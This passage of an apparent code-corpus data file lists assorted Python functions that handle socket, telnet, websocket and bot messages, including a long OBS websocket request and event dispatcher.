please override me.')", "def on_data(self, session, byte_data):\n try:\n str_data = to_str(byte_data).strip()\n\n for cmd in str_data.split(\";\"):\n args = [\n val for val in [\n val.strip() for val in cmd.split(self._seps)\n ] if val]\n\n if not args:\n continue\n\n if not self.on_command(session, args):\n return False\n\n self.put_prompt(session)\n return True\n\n except Exception as exc: # pylint: disable=broad-except\n LOGGER.error(traceback.format_exc())\n self.reply_text(session, \"NG:Error occurred (%s)\" % str(exc))\n return False", "def client_request(self, evt):\n threads.deferToThread(self.cli_db.accept, evt)", "def data_received(self, data):\n pass", "def __async_read_callback(self, data, err) -> None:\n if err != 0:\n 
logging.info('async_read (1): disconnected')\n self.close()\n elif not data:\n logging.info('async_read (2): disconnected')\n self.close()\n elif self.__is_active:\n # Push incoming data through Telnet Option Parser.\n self.receive_buffer.clear()\n for byte in data:\n # Add parsed text data\n return_byte = self.__telnet_parser.iac_sniffer(bytes([byte]))\n if return_byte is not None:\n # logging.info('byte received: {byte}'.format(byte=return_byte))\n # bytes_parsed = bytes_parsed + return_byte\n self.receive_buffer.append(return_byte)\n\n # Data other than Telnet Options, then send back to client. or push through system!!\n if len(self.receive_buffer) > 0:\n # This should now be pushed through for\n # Input on the STATE instead of echoed back!\n logging.info(\"Echo %s\", self.receive_buffer)\n self.async_write(b''.join(self.receive_buffer))\n\n # Ready for next set of incoming data\n self.wait_for_async_data()", "def process_command(self, command):\r\n if self.visprotocol is not None:\r\n _LOGGER.info(\"client process_command called {0} type is {1}\".format(command, type(self.visprotocol))) \r\n self.visprotocol.process_command(command)\r\n else:\r\n _LOGGER.error(\"[VisonicClient] The pyvisonic command is None\")", "def process(self, data, channel = None):\n\t\traise NotImplementException()", "def OnCommand(self, data, onResult=LogAck):\r\n\t\td = self.perspective.callRemote(\"Command\", data)\r\n\t\td.addCallback(onResult)\r\n\t\td.addErrback(self.OnError)", "def handle(self) -> None:\r\n\r\n if self.data.get(\"message-id\") != None:\r\n if self.data[\"status\"] == \"error\":\r\n print(self.data[\"error\"])\r\n return\r\n else:\r\n requestData = self.obs.pendingResponses.pop(self.data[\"message-id\"])\r\n request = requestData[\"request-type\"]\r\n #Requests as of version 4.8.0\r\n\r\n #General\r\n if request == \"GetVersion\":\r\n pass\r\n\r\n elif request == \"GetAuthRequired\":\r\n if self.data[\"authRequired\"]:\r\n secret_string: str = self.obs.password + self.data[\"salt\"]\r\n secret_hash: sha256 = sha256(secret_string.encode(\"utf-8\"))\r\n secret: bytes = b64encode(secret_hash.digest())\r\n\r\n response_string: str = secret.decode(\"utf-8\") + self.data[\"challenge\"]\r\n response_hash: sha256 = sha256(response_string.encode(\"utf-8\"))\r\n response: bytes = b64encode(response_hash.digest())\r\n\r\n self.obs.requests.append({\r\n \"type\": \"Authenticate\",\r\n \"auth\": response.decode(\"utf-8\")})\r\n\r\n else:\r\n self.obs.requests.append({\"type\": \"GetSceneList\"})\r\n\r\n elif request == \"Authenticate\":\r\n self.obs.requests.append({\"type\": \"GetSceneList\"})\r\n\r\n elif request == \"SetHeartbeat\":\r\n #To be removed in 5.0.0\r\n pass\r\n\r\n elif request == \"SetFilenameFormatting\":\r\n pass\r\n\r\n elif request == \"GetFilenameFormatting\":\r\n pass\r\n\r\n elif request == \"GetStats\":\r\n pass\r\n\r\n elif request == \"BroadcastCustomMessage\":\r\n pass\r\n\r\n elif request == \"GetVideoInfo\":\r\n pass\r\n\r\n elif request == \"OpenProjector\":\r\n pass\r\n\r\n elif request == \"TriggerHotkeyByName\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"TriggerHotkeyBySequence\":\r\n #Unreleased\r\n pass\r\n\r\n #Media Control\r\n elif request == \"PlayPauseMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"RestartMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StopMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"NextMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"PreviousMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif 
request == \"GetMediaDuration\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetMediaTime\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"SetMediaTime\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"ScrubMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetMediaState\":\r\n #Unreleased\r\n pass\r\n\r\n #Sources\r\n\r\n elif request == \"GetMediaSourcesList\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetSourcesList\":\r\n pass\r\n\r\n elif request == \"GetSourceTypesList\":\r\n pass\r\n\r\n elif request == \"GetVolume\":\r\n pass\r\n\r\n elif request == \"SetVolume\":\r\n pass\r\n\r\n elif request == \"GetMute\":\r\n pass\r\n\r\n elif request == \"SetMute\":\r\n pass\r\n\r\n elif request == \"ToggleMute\":\r\n pass\r\n\r\n elif request == \"GetAudioActive\":\r\n pass\r\n\r\n elif request == \"SetSourceName\":\r\n pass\r\n\r\n elif request == \"SetSyncOffset\":\r\n pass\r\n\r\n elif request == \"GetSyncOffset\":\r\n pass\r\n\r\n elif request == \"GetSourceSettings\":\r\n pass\r\n\r\n elif request == \"SetSourceSettings\":\r\n pass\r\n\r\n elif request == \"GetTextGDIPlusProperties\":\r\n pass\r\n\r\n elif request == \"SetTextGDIPlusProperties\":\r\n pass\r\n\r\n elif request == \"GetTextFreetype2Properties\":\r\n pass\r\n\r\n elif request == \"SetTextFreetype2Properties\":\r\n pass\r\n\r\n elif request == \"GetBrowserSourceProperties\":\r\n pass\r\n\r\n elif request == \"SetBrowserSourceProperties\":\r\n pass\r\n\r\n elif request == \"GetSpecialSources\":\r\n pass\r\n\r\n elif request == \"GetSourceFilters\":\r\n source = self.obs.getSource(requestData[\"sourceName\"])\r\n if source != None:\r\n for _filter in self.data[\"filters\"]:\r\n source.addFilter(_filter) #type: ignore\r\n\r\n elif request == \"GetSourceFilterInfo\":\r\n pass\r\n\r\n elif request == \"AddFilterToSource\":\r\n pass\r\n\r\n elif request == \"RemoveFilterFromSource\":\r\n pass\r\n\r\n elif request == \"ReorderSourceFilter\":\r\n pass\r\n\r\n elif request == \"MoveSourceFilter\":\r\n pass\r\n\r\n elif request == \"SetSourceFilterSettings\":\r\n pass\r\n\r\n elif request == \"SetSourceFilterVisibility\":\r\n pass\r\n \r\n elif request == \"GetAudioMonitorType\":\r\n pass\r\n\r\n elif request == \"SetAudioMonitorType\":\r\n pass\r\n\r\n elif request == \"TakeSourceScreenshot\":\r\n pass\r\n\r\n #Outpute\r\n elif request == \"ListOutputs\":\r\n pass\r\n\r\n elif request == \"GetOutputInfo\":\r\n pass\r\n\r\n elif request == \"StartOutput\":\r\n pass\r\n\r\n elif request == \"StopOutput\":\r\n pass\r\n\r\n #Profiles\r\n elif request == \"SetCurrentProfile\":\r\n pass\r\n\r\n elif request == \"GetCurrentProfile\":\r\n pass\r\n\r\n elif request == \"ListProfiles\":\r\n pass\r\n\r\n #Recording\r\n elif request == \"GetRecordingStatus\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StartStopRecording\":\r\n pass\r\n\r\n elif request == \"StartRecording\":\r\n pass\r\n\r\n elif request == \"StopRecording\":\r\n pass\r\n\r\n elif request == \"PauseRecording\":\r\n pass\r\n\r\n elif request == \"ResumeRecording\":\r\n pass\r\n\r\n elif request == \"SetRecordingFolder\":\r\n pass\r\n\r\n elif request == \"GetRecordingFolder\":\r\n pass\r\n\r\n #Replay Buffer\r\n elif request == \"GetReplayBufferStatus\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StartStopReplayBuffer\":\r\n pass\r\n\r\n elif request == \"StartReplayBuffer\":\r\n pass\r\n\r\n elif request == \"StopReplayBuffer\":\r\n pass\r\n\r\n elif request == \"SaveReplayBuffer\":\r\n pass\r\n\r\n #Scene Collections\r\n elif 
request == \"SetCurrentSceneCollection\":\r\n pass\r\n\r\n elif request == \"GetCurrentSceneCollection\":\r\n pass\r\n\r\n elif request == \"ListSceneCollections\":\r\n pass\r\n\r\n #Scene Items\r\n elif request == \"GetSceneItemList\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetSceneItemProperties\":\r\n pass\r\n\r\n elif request == \"SetSceneItemProperties\":\r\n pass\r\n\r\n elif request == \"ResetSceneItem\":\r\n pass\r\n\r\n elif request == \"SetSceneItemRender\":\r\n pass\r\n\r\n elif request == \"SetSceneItemPosition\":\r\n pass\r\n\r\n elif request == \"SetSceneItemTransform\":\r\n pass\r\n\r\n elif request == \"SetSceneItemCrop\":\r\n pass\r\n\r\n elif request == \"DeleteSceneItem\":\r\n pass\r\n\r\n elif request == \"AddSceneItem\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"DuplicateSceneItem\":\r\n pass\r\n\r\n #Scenes\r\n elif request == \"SetCurrentScene\":\r\n pass\r\n\r\n elif request == \"GetCurrentScene\":\r\n self.obs.setCurrentScene(self.data[\"name\"])\r\n\r\n elif request == \"GetSceneList\":\r\n for scene in self.data[\"scenes\"]:\r\n self.obs.addScene(scene)\r\n self.obs.setCurrentScene(self.data[\"current-scene\"])\r\n\r\n elif request == \"CreateScene\":\r\n pass\r\n\r\n elif request == \"ReorderSceneItems\":\r\n pass\r\n\r\n elif request == \"SetSceneTransitionOverride\":\r\n pass\r\n\r\n elif request == \"RemoveSceneTransitionOverride\":\r\n pass\r\n\r\n elif request == \"GetSceneTransitionOverride\":\r\n pass\r\n\r\n #Streaming\r\n elif request == \"GetStreamingStatus\":\r\n pass\r\n\r\n elif request == \"StartStopStreaming\":\r\n pass\r\n\r\n elif request == \"StartStreaming\":\r\n pass\r\n\r\n elif request == \"StopStreaming\":\r\n pass\r\n\r\n elif request == \"SetStreamSettings\":\r\n pass\r\n\r\n elif request == \"GetStreamSettings\":\r\n pass\r\n\r\n elif request == \"SaveStreamSettings\":\r\n pass\r\n\r\n elif request == \"SendCaptions\":\r\n pass\r\n\r\n #Studio Mode\r\n elif request == \"GetStudioModeStatus\":\r\n pass\r\n\r\n elif request == \"GetPreviewScene\":\r\n pass\r\n\r\n elif request == \"SetPreviewScene\":\r\n pass\r\n\r\n elif request == \"TransitionToProgram\":\r\n pass\r\n\r\n elif request == \"EnableStudioMode\":\r\n pass\r\n\r\n elif request == \"DisableStudioMode\":\r\n pass\r\n\r\n elif request == \"ToggleStudioMode\":\r\n pass\r\n\r\n #Transitions\r\n elif request == \"GetTransitionList\":\r\n pass\r\n\r\n elif request == \"GetCurrentTransition\":\r\n pass\r\n\r\n elif request == \"SetCurrentTransition\":\r\n pass\r\n\r\n elif request == \"SetTransitionDuration\":\r\n pass\r\n\r\n elif request == \"GetTransitionDuration\":\r\n pass\r\n\r\n elif request == \"GetTransitionPosition\":\r\n pass\r\n\r\n else:\r\n print(f\"Unhandled response of type {request} and data {self.data}.\")\r\n\r\n \r\n\r\n else:\r\n event: str = self.data[\"update-type\"]\r\n #Events as of 4.8.0\r\n\r\n #Scenes\r\n if event == \"SwitchScenes\":\r\n self.obs.setCurrentScene(self.data[\"scene-name\"])\r\n\r\n elif event == \"ScenesChanged\":\r\n #self.obs.purgeScenes()\r\n pass\r\n\r\n elif event == \"SceneCollectionChanged\":\r\n pass\r\n\r\n elif event == \"SceneCollectionListChanged\":\r\n pass\r\n\r\n #Transitions\r\n elif event == \"SwitchTransition\":\r\n pass\r\n\r\n elif event == \"TransitionListChanged\":\r\n pass\r\n\r\n elif event == \"TransitionDurationChanged\":\r\n pass\r\n\r\n elif event == \"TransitionBegin\":\r\n pass\r\n\r\n elif event == \"TransitionEnd\":\r\n pass\r\n\r\n elif event == \"TransitionVideoEnd\":\r\n pass\r\n\r\n 
#Profiles\r\n elif event == \"ProfileChanged\":\r\n pass\r\n\r\n elif event == \"ProfileListChanged\":\r\n pass\r\n\r\n #Streaming\r\n elif event == \"StreamStarting\":\r\n pass\r\n\r\n elif event == \"StreamStarted\":\r\n pass\r\n\r\n elif event == \"StreamStopping\":\r\n pass\r\n\r\n elif event == \"StreamStopped\":\r\n pass\r\n\r\n elif event == \"StreamStatus\":\r\n pass\r\n\r\n #Recording\r\n elif event == \"RecordingStarting\":\r\n pass\r\n\r\n elif event == \"RecordingStarted\":\r\n pass\r\n\r\n elif event == \"RecordingStopping\":\r\n pass\r\n\r\n elif event == \"RecordingStopped\":\r\n pass\r\n\r\n elif event == \"RecordingPaused\":\r\n pass\r\n\r\n elif event == \"RecordingResumed\":\r\n pass\r\n\r\n #Replay Buffer\r\n elif event == \"ReplayStarting\":\r\n pass\r\n\r\n elif event == \"ReplayStarted\":\r\n pass\r\n\r\n elif event == \"ReplayStopping\":\r\n pass\r\n\r\n elif event == \"ReplayStopped\":\r\n pass\r\n\r\n #Other\r\n elif event == \"Exiting\":\r\n pass\r\n\r\n #General\r\n elif event == \"Heartbeat\":\r\n pass\r\n\r\n elif event == \"BroadcastCustomMessage\":\r\n pass\r\n\r\n #Sources\r\n elif event == \"SourceCreated\":\r\n pass\r\n\r\n elif event == \"SourceDestroyed\":\r\n pass\r\n\r\n elif event == \"SourceVolumeChanged\":\r\n pass\r\n\r\n elif event == \"SourceMuteStateChanged\":\r\n pass\r\n\r\n elif event == \"SourceAudioDeactivated\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"SourceAudioActivated\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"SourceAudioSyncOffsetChanged\":\r\n pass\r\n\r\n elif event == \"SourceAudioMixersChanged\":\r\n pass\r\n\r\n elif event == \"SourceRenamed\":\r\n pass\r\n\r\n elif event == \"SourceFilterAdded\":\r\n pass\r\n\r\n elif event == \"SourceFilterRemoved\":\r\n pass\r\n\r\n elif event == \"SourceFilterVisibilityChanged\":\r\n source = self.obs.getSource(self.data[\"sourceName\"])\r\n if source != None:\r\n _filter = source.getFilter(self.data[\"filterName\"]) #type: ignore\r\n if _filter != None:\r\n _filter.setVisible(self.data[\"filterEnabled\"]) #type: ignore\r\n\r\n elif event == \"SourceFiltersReordered\":\r\n pass\r\n\r\n #Media\r\n elif event == \"MediaPlaying\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaPaused\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaRestarted\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaStopped\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaNext\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaPrevious\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaStarted\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaEnded\":\r\n #Unreleased\r\n pass\r\n\r\n #Scene Items\r\n elif event == \"SceneItemOrderChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemAdded\":\r\n pass\r\n\r\n elif event == \"SceneItemRemoved\":\r\n pass\r\n\r\n elif event == \"SceneItemVisibilityChanged\":\r\n scene = self.obs.getScene(self.data[\"scene-name\"])\r\n if scene != None:\r\n source = scene.getSource(self.data[\"item-name\"]) #type: ignore\r\n if source != None:\r\n source.setVisible(self.data[\"item-visible\"]) #type: ignore\r\n \r\n\r\n elif event == \"SceneItemLockChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemTransformChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemSelected\":\r\n pass\r\n\r\n elif event == \"SceneItemDeselected\":\r\n pass\r\n\r\n #Studio Mode\r\n elif event == \"PreviewSceneChanged\":\r\n pass\r\n\r\n elif event == \"StudioModeSwitched\":\r\n pass\r\n\r\n #Unhandled Events\r\n else:\r\n print(\"Unhandled event 
with data: \" + str(self.data))", "def server_do(self,input, connstream):\r\n pass", "def _handle_request(self, info, desired=None):\r\n debug_print('%s request:' % info.name)\r\n\r\n editor = info.editor\r\n if ((not editor.is_python_like())\r\n or sourcecode.is_keyword(info.obj)\r\n or editor.in_comment_or_string()):\r\n desired = 'fallback'\r\n\r\n self.pending = (info, desired)\r\n if not self.busy:\r\n self._handle_pending()", "def _callback_main(self, data):\n alpha = data.data\n self.command_synergy(alpha)", "def _on_read(self, line):\n # Some game logic (or magic)\n line = line.strip()\n logger.info(\"RCV> %s\", line)\n if not line:\n self.stream.close()\n return\n\n self.stream.write(\"echo: %s\\n\" % line)\n\n # Wait for further input on this connection\n self.wait()", "def _ngl_handle_msg(self, widget, msg, buffers):\n self._ngl_msg = msg\n\n msg_type = self._ngl_msg.get('type')\n if msg_type == 'request_frame':\n self.frame += self.player.step\n if self.frame >= self.count:\n self.frame = 0\n elif self.frame < 0:\n self.frame = self.count - 1\n elif msg_type == 'repr_parameters':\n data_dict = self._ngl_msg.get('data')\n name = data_dict.pop('name') + '\\n'\n selection = data_dict.get('sele', '') + '\\n'\n # json change True to true\n data_dict_json = json.dumps(data_dict).replace(\n 'true', 'True').replace('false', 'False')\n data_dict_json = data_dict_json.replace('null', '\"null\"')\n\n if self.player.widget_repr is not None:\n # TODO: refactor\n repr_name_text = widget_utils.get_widget_by_name(\n self.player.widget_repr, 'repr_name_text')\n repr_selection = widget_utils.get_widget_by_name(\n self.player.widget_repr, 'repr_selection')\n repr_name_text.value = name\n repr_selection.value = selection\n elif msg_type == 'request_loaded':\n if not self.loaded:\n # trick to trigger observe loaded\n # so two viewers can have the same representations\n self.loaded = False\n self.loaded = msg.get('data')\n elif msg_type == 'request_repr_dict':\n # update _repr_dict will trigger other things\n # see _handle_repr_dict_changed\n self._ngl_repr_dict = self._ngl_msg.get('data')\n elif msg_type == 'stage_parameters':\n self._ngl_full_stage_parameters = msg.get('data')\n elif msg_type == 'async_message':\n if msg.get('data') == 'ok':\n self._event.set()", "def process_command(self, command):\r\n if self.visprotocol is not None:\r\n _LOGGER.debug(\"client process_command called %s type is %s\", command, type(self.visprotocol))\r\n self.visprotocol.process_command(command)\r\n else:\r\n _LOGGER.warning(\"[VisonicClient] The pyvisonic command is None\")", "def process_event(event, device_id):\n print(event)\n if event.type == EventType.ON_CONVERSATION_TURN_STARTED:\n adjustvolume('30')\n subprocess.Popen([\"aplay\", \"/opt/RPIGassistant/audio-files/Listening.wav\"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n GPIO.output(5,GPIO.HIGH)\n led.ChangeDutyCycle(100)\n print()\n\n if (event.type == EventType.ON_RESPONDING_STARTED and event.args and not event.args['is_error_response']):\n GPIO.output(5,GPIO.LOW)\n GPIO.output(6,GPIO.HIGH)\n led.ChangeDutyCycle(50)\n\n if event.type == EventType.ON_RESPONDING_FINISHED:\n GPIO.output(6,GPIO.LOW)\n GPIO.output(5,GPIO.HIGH)\n led.ChangeDutyCycle(100)\n print()\n\n if (event.type == EventType.ON_CONVERSATION_TURN_TIMEOUT):\n say(random.choice(['sorry, i did not hear what you said', \n 'sorry, i did not hear anything', \n 'pardon', \n 'sorry, have you said something?']))\n restorevolume()\n print()\n\n if (event.type == 
EventType.ON_NO_RESPONSE):\n restorevolume()\n print()\n\n if (event.type == EventType.ON_CONVERSATION_TURN_FINISHED and\n event.args and not event.args['with_follow_on_turn']):\n restorevolume()\n GPIO.output(5,GPIO.LOW)\n led.ChangeDutyCycle(0)\n print()\n\n if event.type == EventType.ON_DEVICE_ACTION:\n for command, params in process_device_actions(event, device_id):\n print('Do command', command, 'with params', str(params))", "def process(self, data):\n\t\tif data['action'] == '0x40':\n\t\t\tself.authenticate(data)\n\t\telse:\n\t\t\t# Protocol error\n\t\t\tstack['clients'][self.client_ident].put(1,{'type':'0x000','status':'0x001'})", "def handle(self):\n self.ip = self.client_address[0]\n self.port = self.client_address[1]\n self.connection = self.request\n\n state.addConnection(self.connection)\n\n # Loop that listens for messages from the client\n while True:\n received_string = self.connection.recv(4096)\n\n if len(received_string) == 0:\n continue\n\n # TODO: Add handling of received payload from client\n\n # Convert payload from JSON to object\n payloadToData = json.loads(received_string)\n\n # determine what request is being made\n request_handler = RequestHandler(payloadToData,\n state,\n self.connection)\n\n # execute and generate response (JSON formatted)\n jsonResponse = request_handler.callHandler()\n\n if not jsonResponse == 'BROADCAST':\n # send response\n self.connection.send(bytes(jsonResponse, \"ascii\"))", "def receive(self, data):\n raise NotImplementedError", "def receive(self, data):\n raise NotImplementedError", "def _process(self):\n\n while True:\n try:\n sockets = [self.master_fd]\n if self.sock:\n sockets.append(self.sock)\n # Don't handle user input while a side command is running.\n if len(self.filter) == 1:\n sockets.append(pty.STDIN_FILENO)\n rfds, _, _ = select.select(sockets, [], [], 0.25)\n except select.error as ex:\n if ex[0] == errno.EAGAIN: # Interrupted system call.\n continue\n raise\n\n if not rfds:\n self._timeout()\n else:\n # Handle one packet at a time to mitigate the side channel\n # breaking into user input.\n if self.master_fd in rfds:\n data = os.read(self.master_fd, 1024)\n self.master_read(data)\n elif pty.STDIN_FILENO in rfds:\n data = os.read(pty.STDIN_FILENO, 1024)\n self.stdin_read(data)\n elif self.sock in rfds:\n data, self.last_addr = self.sock.recvfrom(65536)\n if data[-1] == b'\\n':\n self.log(\"WARNING: the command ending with <nl>. 
\"\n \"The StreamProxy filter known to fail.\")\n self.log(\"Got command '%s'\" % data.decode('utf-8'))\n command = self.filter_command(data)\n self.log(\"Translated command '{}'\"\n .format(command.decode('utf-8')))\n if command:\n self.write_master(command)\n self.write_master(b'\\n')", "def process(self):\n try:\n (data, peer) = self._socket.recvfrom(1024)\n request = json.loads(data.decode())\n command = request['command']\n method = getattr(self, 'do_' + command)\n try:\n result = method(request)\n if result is not None:\n self._send_response(result, peer)\n except KeyError as exc:\n self._logger.error(\n \"missing parameter for command '%s': '%s'\",\n command, exc.args[0]\n )\n except ValueError:\n self._logger.error(\"invalid control request received\")\n except KeyError:\n self._logger.error(\"no control command specified\")\n except AttributeError:\n self._logger.error(\"unknown control command '%s'\", command)\n return []", "def read_for_explore_run(self):\n b_data = self.client_sock.recv(1024)\n if b_data!=None and len(b_data)!=0:\n if b_data!=\"GRID\": # AUTO mode in android, to avoid flush cmd\n print \"Received from Android: %s\" % b_data\n if b_data==\"explore\":\n print_msg(self.name, \"Setting \\\"explore\\\" flag\")\n self.explore_start = True\n elif b_data==\"run\":\n print_msg(self.name, \"Setting \\\"run\\\" flag\")\n self.run_start = True\n else:\n pass", "def handle(self, data):\n pass", "def outReceived(self, data):\n log.msg('got %r' % data)\n lines = (self._lineBuffer + data).split(b'\\n')\n self._lineBuffer = lines.pop(-1)\n self._linesReceived.extend(lines)\n # XXX - not strictly correct.\n # We really want onOutReceived to fire after the first 'cftp>' prompt\n # has been received. (See use in OurServerCmdLineClientTests.setUp)\n if self.onOutReceived is not None:\n d, self.onOutReceived = self.onOutReceived, None\n d.callback(data)\n self.buffer += data\n self._checkForCommand()", "def send(self, *args, **kwargs):\n if not self.paused():\n raise RuntimeError(\"Machine is not awaiting input\")\n else:\n self.args = (args, kwargs)", "def handle_user_input(self,args):\n import ipcAPI,config\n\n message = self.get_message(args)\n try:\n client = ipcAPI.ipcClient(config.SOCKET_FILE)\n\n client.send_data(message)\n\n resp = client.recv_data()\n\n print(\"{} : {}\".format(resp['status'],resp['message']))\n except:\n print(\"Error while communicating with server\")\n return False\n \n return True", "def handle_request(self):\n\t\ttry:\n\t\t\tr,w,e=select.select([self.socket],[],[], 1.0)\n\t\t\tif not r:\n\t\t\t\treturn\n\t\t\trequest, client_address=self.socket.accept()\n\t\texcept:\n\t\t\treturn\t\t\n\t\t\n\t\ttry:\n\t\t\tif self.debug:\n\t\t\t\tprint \"got request\"\n\t\t\tself.process_request(request, client_address)\n\t\texcept:\n\t\t\tself.handle_error(request, client_address)", "def handle(self):\n try:\n # Wait for data\n data = json.loads(self.request.recv(1024).decode('UTF-8').strip())\n\n # Process data\n self.process_data(data)\n\n except Exception as e:\n print(\"Exception wile receiving message: \", e)\n self.request.sendall(\n bytes(json.dumps({'return': 'error'}), 'UTF-8'))", "def async_handle_dispatch(self, *args) -> None:\n if not args:\n self.update_ha_state()\n return\n\n payload = args[0]\n if payload.get(UNIQUE_ID) != self.unique_id:\n return\n elif payload[SERVICE] == SVC_RESET_SYSTEM_MODE:\n self._call_client_api(self._device.reset_mode)\n elif payload[SERVICE] == SVC_SET_SYSTEM_MODE:\n kwargs = dict(payload[DATA])\n kwargs[\"system_mode\"] = 
kwargs.pop(\"mode\", None)\n until = kwargs.pop(\"duration\", None) or kwargs.pop(\"period\", None)\n kwargs[\"until\"] = (dt.now() + until) if until else None\n self._call_client_api(self._device.set_mode, **kwargs)", "def receive(self):\n pass", "def handle_data(self, data):\n if self._wait_auth:\n if len(data) != self._AUTH_LEN:\n self.force_close()\n return\n data = list(self._cipher_rx.crypt(data))\n authl = list(self._auth_data)\n if data == authl:\n self._wait_auth = False\n self._timeout = None\n self.set_number()\n else:\n self.force_close()\n elif self.remote_user:\n self.remote_user.send(self._cipher_rx.crypt(data))", "def handle(self):\n data = self.request.recv(1024)\n self.request.send(data)", "def cmd(self, data, enable):\n pass", "def data_in(self, data, **kwargs):\n action_type = data.get(\"t\", \"UNKNOWN\")\n\n if action_type == \"MESSAGE_CREATE\":\n # someone posted a message on Discord that the bot can see\n data = data[\"d\"]\n if data[\"author\"][\"id\"] == self.discord_id:\n # it's by the bot itself! disregard\n return\n message = data[\"content\"]\n channel_id = data[\"channel_id\"]\n keywords = {\"channel_id\": channel_id}\n if \"guild_id\" in data:\n # message received to a Discord channel\n keywords[\"type\"] = \"channel\"\n author = data[\"member\"][\"nick\"] or data[\"author\"][\"username\"]\n author_id = data[\"author\"][\"id\"]\n keywords[\"sender\"] = (author_id, author)\n keywords[\"guild_id\"] = data[\"guild_id\"]\n\n else:\n # message sent directly to the bot account via DM\n keywords[\"type\"] = \"direct\"\n author = data[\"author\"][\"username\"]\n author_id = data[\"author\"][\"id\"]\n keywords[\"sender\"] = (author_id, author)\n\n # pass the processed data to the server\n self.sessionhandler.data_in(self, bot_data_in=(message, keywords))\n\n elif action_type in (\"GUILD_CREATE\", \"GUILD_UPDATE\"):\n # we received the current status of a guild the bot is on; process relevant info\n data = data[\"d\"]\n keywords = {\"type\": \"guild\", \"guild_id\": data[\"id\"], \"guild_name\": data[\"name\"]}\n keywords[\"channels\"] = {\n chan[\"id\"]: {\"name\": chan[\"name\"], \"guild\": data[\"name\"]}\n for chan in data[\"channels\"]\n if chan[\"type\"] == 0\n }\n # send the possibly-updated guild and channel data to the server\n self.sessionhandler.data_in(self, bot_data_in=(\"\", keywords))\n\n elif \"DELETE\" in action_type:\n # deletes should possibly be handled separately to check for channel removal\n # for now, just ignore\n pass\n\n else:\n # send the data for any other action types on to the bot as-is for optional server-side handling\n keywords = {\"type\": action_type}\n keywords.update(data[\"d\"])\n self.sessionhandler.data_in(self, bot_data_in=(\"\", keywords))", "def comms_callback(received, prog):\n\n try:\n self.handle_incoming_bytes(received)\n return int(self.__comm_term) \n\n except Exception as e:\n self.__comm_term = True\n self.__comm_exc = e\n return 1", "def _process_input(self, fd):\n if fd.fileno() == self._proxyfd.fileno():\n pkt = self._grab_packet(\n lambda data, s=self: s.create_packet(packet=data), fd)\n self._handle_proxy_packet(pkt)\n else:\n Server._process_input(self, fd)", "def handle(self):\n socket = self.request[1]\n data = self.request[0].strip()\n logger.info(\"Address {} at {} wrote: '{}'\".format(self.client_address[1], self.client_address[0], data))\n cmd_strn, ret = self.command_service(data)\n print(ret)\n self.command_response(cmd_strn, ret, self.request[1], self.client_address[0],\n 
self.mapInterface.router[cmd_strn])", "def handle_message(self, data, channel):\n pass", "def _on_interest(self, int_name, int_param, _app_param):\n if int_param.must_be_fresh:\n return\n data_bytes = self.storage.get_data_packet(int_name, int_param.can_be_prefix)\n if data_bytes == None:\n return\n self.app.put_raw_packet(data_bytes)\n logging.info(f'Read handle: serve data {Name.to_str(int_name)}')", "def _send_data(self):\n pass", "def handle_one_request(self):\n import socket\n try:\n self.raw_requestline = self.rfile.readline(65537)\n if len(self.raw_requestline) > 65536:\n self.requestline = ''\n self.request_version = ''\n self.command = ''\n self.send_error(414)\n return\n if not self.raw_requestline:\n self.close_connection = 1\n return\n if not self.parse_request():\n # An error code has been sent, just exit\n return\n\n ##### Customization\n # origin\n \"\"\"\n mname = 'do_' + self.command\n if not hasattr(self, mname):\n self.send_error(501, \"Unsupported method (%r)\" % self.command)\n return\n method = getattr(self, mname)\n method()\n \"\"\"\n # now\n #import pdb; pdb.set_trace()\n self.delegate(self.get_environ(), self.gen_response, self.send_error)\n\n self.wfile.flush() #actually send the response if not already done.\n except socket.timeout, e:\n #a read or a write timed out. Discard this connection\n self.log_error(\"Request timed out: %r\", e)\n self.close_connection = 1\n return", "def receive():\n pass", "def handleActuatorCommandMessage(self, data: ActuatorData) -> bool:\n\t\tlogging.info(\"[CDA_CALLBACK]----->>>The handleActuatorCommandMessage method is being called\")\n\t\tif data:\n\t\t\tlogging.info(\"Processing actuator command message.\")\n\t\t\t\n\t\t\t# TODO: add further validation before sending the command\n\t\t\tself.actuatorAdapterManager.sendActuatorCommand(data)\n\t\t\treturn True\n\t\telse:\n\t\t\tlogging.warning(\"Received invalid ActuatorData command message. Ignoring.\")\n\t\t\treturn False", "def request() -> None:\n\t_flag.set()", "def process_request(self, request):\n self.req = request\n command = self.get_command()\n file_handler = filehandler.FileHandler(command)\n file_handler.handle_command()\n return command.result", "def do_on_input_update(self, msg_id, payload, player):\n pass", "def collect_incoming_data(self, data):\n self.in_buffer.append(data)\n self.in_buffer_len += len(data)\n # Flush buffer if it gets too long (possible DoS attacks).\n # RFC-959 specifies that a 500 response could be given in\n # such cases\n buflimit = 2048\n if self.in_buffer_len > buflimit:\n self.respond('500 Command too long.')\n self.log('Command received exceeded buffer limit of %s.' 
